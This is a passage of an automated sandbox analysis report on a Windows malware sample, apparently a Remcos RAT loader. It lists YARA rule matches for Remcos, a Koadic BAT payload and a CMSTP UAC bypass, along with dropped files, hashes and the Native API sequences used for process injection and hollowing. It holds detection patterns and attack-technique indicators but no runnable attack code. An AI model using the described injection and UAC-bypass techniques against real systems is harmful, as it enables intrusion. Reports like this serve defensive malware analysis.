                  Source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\Public\Libraries\OcihlomcO.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                  PE file contains section with special chars
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028BC3F8
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028BC368
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BA1C0 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle,0_2_028BA1C0
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_028BC4DC
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7AC0
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028B7968
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028BC3F6
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B79FC GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory,0_2_028B79FC
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028B7966
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_028B7F48
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_028B7F46
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: 7_2_02AFA1C0 NtOpenProcess,NtWriteVirtualMemory,NtCreateThreadEx,7_2_02AFA1C0
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: 7_2_02AFC4DC NtOpenFile,NtReadFile,7_2_02AFC4DC
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: 7_2_02AF7968 NtAllocateVirtualMemory,7_2_02AF7968
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: 7_2_02AF79FC NtProtectVirtualMemory,7_2_02AF79FC
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: 7_2_02AF7966 NtAllocateVirtualMemory,7_2_02AF7966
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BCA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,0_2_028BCA6C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046767B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_046767B4
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6467B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_1C6467B4
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A20C40_2_028A20C4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046974E65_2_046974E6
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0469E5585_2_0469E558
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046987705_2_04698770
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467F0FA5_2_0467F0FA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0469E0CC5_2_0469E0CC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046981685_2_04698168
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046B41595_2_046B4159
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046A61F05_2_046A61F0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0469E2FB5_2_0469E2FB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046B332B5_2_046B332B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0468739D5_2_0468739D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04697D335_2_04697D33
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04695E5E5_2_04695E5E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04686E0E5_2_04686E0E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0469DE9D5_2_0469DE9D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04696FEA5_2_04696FEA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04673FCA5_2_04673FCA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046978FE5_2_046978FE
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046939465_2_04693946
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046AD9C95_2_046AD9C9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04687A465_2_04687A46
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467DB625_2_0467DB62
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04687BAF5_2_04687BAF
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_067146525_2_06714652
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0671860A5_2_0671860A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0672E6D55_2_0672E6D5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_067087525_2_06708752
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0671947C5_2_0671947C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0671F2645_2_0671F264
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_067340375_2_06734037
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0671F0075_2_0671F007
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_067080A95_2_067080A9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_067181F25_2_067181F2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06718E745_2_06718E74
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06734E655_2_06734E65
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_066FFE065_2_066FFE06
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06726EFC5_2_06726EFC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06717CF65_2_06717CF6
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_066F4CD65_2_066F4CD6
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0671EDD85_2_0671EDD8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06718A3F5_2_06718A3F
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06716B6A5_2_06716B6A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06707B1A5_2_06707B1A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0671EBA95_2_0671EBA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_066FE86E5_2_066FE86E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_067088BB5_2_067088BB
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: 7_2_02AE20C47_2_02AE20C4
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0486947C8_2_0486947C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0487E6D58_2_0487E6D5
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0486860A8_2_0486860A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_048646528_2_04864652
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_048587528_2_04858752
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_048580A98_2_048580A9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0486F0078_2_0486F007
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_048840378_2_04884037
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_048681F28_2_048681F2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0486F2648_2_0486F264
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04844CD68_2_04844CD6
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04867CF68_2_04867CF6
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0486EDD88_2_0486EDD8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04876EFC8_2_04876EFC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0484FE068_2_0484FE06
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04884E658_2_04884E65
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04868E748_2_04868E74
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_048588BB8_2_048588BB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0484E86E8_2_0484E86E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04868A3F8_2_04868A3F
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0486EBA98_2_0486EBA9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04857B1A8_2_04857B1A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04866B6A8_2_04866B6A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C667D338_2_1C667D33
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C665E5E8_2_1C665E5E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C656E0E8_2_1C656E0E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C66DE9D8_2_1C66DE9D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C666FEA8_2_1C666FEA
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C643FCA8_2_1C643FCA
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6678FE8_2_1C6678FE
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6639468_2_1C663946
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C67D9C98_2_1C67D9C9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C657A468_2_1C657A46
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C64DB628_2_1C64DB62
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C657BAF8_2_1C657BAF
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6674E68_2_1C6674E6
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C66E5588_2_1C66E558
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6686E88_2_1C6686E8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6687708_2_1C668770
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C64F0FA8_2_1C64F0FA
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C66E0CC8_2_1C66E0CC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6681688_2_1C668168
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6841598_2_1C684159
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6761F08_2_1C6761F0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C66E2FB8_2_1C66E2FB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C68332B8_2_1C68332B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C65739D8_2_1C65739D
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Ocihlomc.PIF 8A005601E52341E8AFF3C95CF30F4EDE6B874D2B7E6FFDB9AFDA9425733FC5D7
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\netutils.dll A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: String function: 028A6658 appears 32 times
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: String function: 028B7BE8 appears 45 times
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: String function: 028A4698 appears 247 times
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: String function: 028A4824 appears 882 times
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: String function: 028A44A0 appears 67 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04694770 appears 41 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04694E10 appears 54 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04661E65 appears 34 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0671547C appears 41 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 066E2B71 appears 34 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06715B1C appears 54 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04662093 appears 50 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 1C631E65 appears 34 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 1C664770 appears 41 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 1C664E10 appears 54 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 04832B71 appears 34 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 04865B1C appears 54 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0486547C appears 41 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 1C632093 appears 50 times
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: String function: 02AE6658 appears 32 times
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: String function: 02AE4698 appears 156 times
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFCode function: String function: 02AE4824 appears 628 times
                  Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
                  Source: XY2I8rWLkM.exeBinary or memory string: OriginalFilename vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2037895391.0000000014C50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
                  Source: XY2I8rWLkM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
